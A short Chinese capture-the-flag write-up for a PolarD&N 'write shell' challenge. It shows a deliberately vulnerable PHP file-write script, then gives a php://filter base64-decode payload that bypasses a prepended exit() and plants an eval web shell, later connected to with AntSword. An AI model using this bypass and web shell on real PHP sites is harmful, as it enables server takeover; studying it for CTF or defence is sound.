polar CTF 写shell

发布时间:2024年01月14日

一、题目

<?php
/*

PolarD&N CTF

*/

highlight_file(__FILE__);

file_put_contents($_GET['filename'],"<?php exit();".$_POST['content']);

?>

二、解题
payload

?filename=php://filter/convert.base64-decode/resource=shell.php
#<?=@eval($_POST[1]);?>
content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg== 

然后访问/shell.php发现木马被读入,用蚁剑连接

在这里插入图片描述

文章来源:https://blog.csdn.net/qq_36286161/article/details/135588021
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。